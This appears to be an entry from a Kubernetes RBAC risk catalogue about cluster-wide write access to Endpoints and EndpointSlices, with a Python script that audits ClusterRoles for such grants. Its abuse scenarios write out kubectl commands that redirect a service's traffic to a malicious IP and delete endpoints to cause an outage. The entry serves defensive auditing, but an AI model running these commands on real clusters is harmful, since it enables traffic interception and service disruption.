Manage Endpoints or EndpointSlices cluster-wide
NetworkManipulation
Critical
Overview
Field | Value |
---|---|
ID | 1073 |
Name | Manage Endpoints or EndpointSlices cluster-wide |
Risk Category | NetworkManipulation |
Risk Level | Critical |
Role Type | ClusterRole |
API Groups | core, discovery.k8s.io |
Resources | endpoints, endpointslices |
Verbs | create, update, patch, delete, get, list |
Tags | DenialOfService ManInTheMiddle NetworkManipulation Tampering TrafficRedirection |
Description
Allows creating, updating, or deleting Endpoints/EndpointSlices for services across all namespaces. This can be used to redirect traffic intended for legitimate services to malicious pods (Man-in-the-Middle), cause denial of service, or bypass network policies.
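A defensive check for this rule, as an added example that is not part of the original page or the catalogue's own code: it scans ClusterRole objects (shaped like the items of `kubectl get clusterroles -o json`) for write access to these resources, treating `*` as a match. The function names, the sample roles and the choice to flag only the mutating verbs are assumptions.

```python
# Added example. Sample roles are constructed, not taken from a real cluster.
# Assumption: only the mutating verbs from the rule's verb list are flagged.
WRITE_VERBS = {"create", "update", "patch", "delete"}
# RBAC writes the core API group as the empty string.
TARGETS = {"": "endpoints", "discovery.k8s.io": "endpointslices"}

def _matches(granted, wanted):
    """An RBAC list matches on an exact entry or on the '*' wildcard."""
    return "*" in granted or wanted in granted

def endpoint_write_grants(rule):
    """Return {resource: [write verbs]} that one PolicyRule grants."""
    found = {}
    verbs = rule.get("verbs", [])
    for group, resource in TARGETS.items():
        if not _matches(rule.get("apiGroups", []), group):
            continue
        if not _matches(rule.get("resources", []), resource):
            continue
        granted = WRITE_VERBS if "*" in verbs else WRITE_VERBS & set(verbs)
        if granted:
            found[resource] = sorted(granted)
    return found

def audit_clusterroles(roles):
    """Return (role name, resource, verbs) for every risky grant."""
    findings = []
    for role in roles:
        merged = {}
        # Aggregated ClusterRoles can carry "rules": null.
        for rule in role.get("rules") or []:
            for resource, verbs in endpoint_write_grants(rule).items():
                merged.setdefault(resource, set()).update(verbs)
        for resource in sorted(merged):
            findings.append((role["metadata"]["name"], resource, sorted(merged[resource])))
    return findings

SAMPLE_ROLES = [  # constructed input
    {"metadata": {"name": "mesh-controller"}, "rules": [
        {"apiGroups": ["discovery.k8s.io"], "resources": ["endpointslices"],
         "verbs": ["get", "list", "create", "update"]}]},
    {"metadata": {"name": "ops-admin"}, "rules": [
        {"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "service-viewer"}, "rules": [
        {"apiGroups": [""], "resources": ["endpoints", "services"],
         "verbs": ["get", "list", "watch"]}]},
    {"metadata": {"name": "aggregated"}, "rules": None},
]

if __name__ == "__main__":
    for name, resource, verbs in audit_clusterroles(SAMPLE_ROLES):
        print(f"{name}: {resource} -> {', '.join(verbs)}")
```

A ClusterRole only applies across all namespaces when it is bound with a ClusterRoleBinding, so follow each finding to its bindings before rating it.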
Abuse Scenarios
- Create a new Endpoint to redirect traffic for a service to a malicious IP.

  ```bash
  kubectl create -n <namespace> -f - <<EOF
  apiVersion: v1
  kind: Endpoints
  metadata:
    name: <service-name> # Must match an existing service name
  subsets:
    - addresses:
        - ip: <malicious-ip-address>
      ports:
        - port: <service-port>
  EOF
  # Example: kubectl create -n default -f - <<EOF ... EOF (redirect 'kubernetes' service)
  ```

- Delete an existing Endpoint, causing service disruption (DoS).

  ```bash
  kubectl delete endpoint <endpoint-name> -n <namespace>
  # Example: kubectl delete endpoint my-app-service -n production
  ```